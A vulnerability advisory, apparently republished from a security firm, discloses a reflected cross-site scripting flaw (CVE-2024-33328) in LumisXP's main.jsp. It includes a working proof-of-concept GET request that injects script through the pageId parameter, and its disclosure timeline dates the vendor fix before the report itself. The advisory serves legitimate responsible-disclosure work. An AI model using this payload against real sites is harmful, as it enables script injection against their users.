LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in main.jsp
6b2f2821d4c2d0424a401ff4ad365da2713d18f6c494dadd54e7fce8dfe51786=====[ Tempest Security Intelligence - ADV-6/2024
]==========================
LumisXP v15.0.x to v16.1.x
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Vulnerability
Information]=============================================
* Class: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting')
('Improper Neutralization of Input During Web Page Generation ('Cross-site
Scripting')') [CWE-79]
* CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4
=====[ Overview]========================================================
* System affected : LumisXP
* Software Version : Version - v15.0.x to v16.1.x
* Impacts :
* Vulnerability: A cross-site scripting (XSS) vulnerability in the
component main.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to
execute arbitrary web scripts or HTML via a crafted payload injected into
the pageId parameter.
=====[ Detailed
description]=================================================
* XSS [GET
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa
]:
1 - Send the link by inserting the XSS payload into the pageId= parameter.
```
GET
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa
```
2 - Verify that in the response your payload will be executed.
=====[ Timeline of
disclosure]===============================================
2/Apr/2024 - Responsible disclosure was initiated with the vendor.
12/Apr/2024 - LumisXP Support confirmed the issue;
16/Fev/2024 - The vendor fixed the vulnerability
29/May/2024 - CVEs was assigned and reserved as CVE-2024-33328
=====[ Thanks & Acknowledgements]========================================
* Tempest Security Intelligence [1]
* Rodolfo Tavares
* Niklas Correa
=====[ References ]=====================================================
[1][ [https://cwe.mitre.org/data/definitions/79.html]
[2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]
[3][Thanks Filipe X.]
=====[ EOF ]===========================================================
--
--
*Esta mensagem é para uso exclusivo de seu destinatário e pode conter
informações privilegiadas e confidenciais. Todas as informações aqui
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste
caso, por favor, notifique o remetente da mesma e destrua imediatamente a
mensagem.*
*
*
*This message is intended solely for the use of its
addressee and may contain privileged or confidential information. All
information contained herein shall be treated as confidential and shall not
be disclosed to any third party without Tempest’s prior written approval.
If you are not the addressee you should not distribute, copy or file this
message. In this case, please notify the sender and destroy its contents
immediately.**
*
*
*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed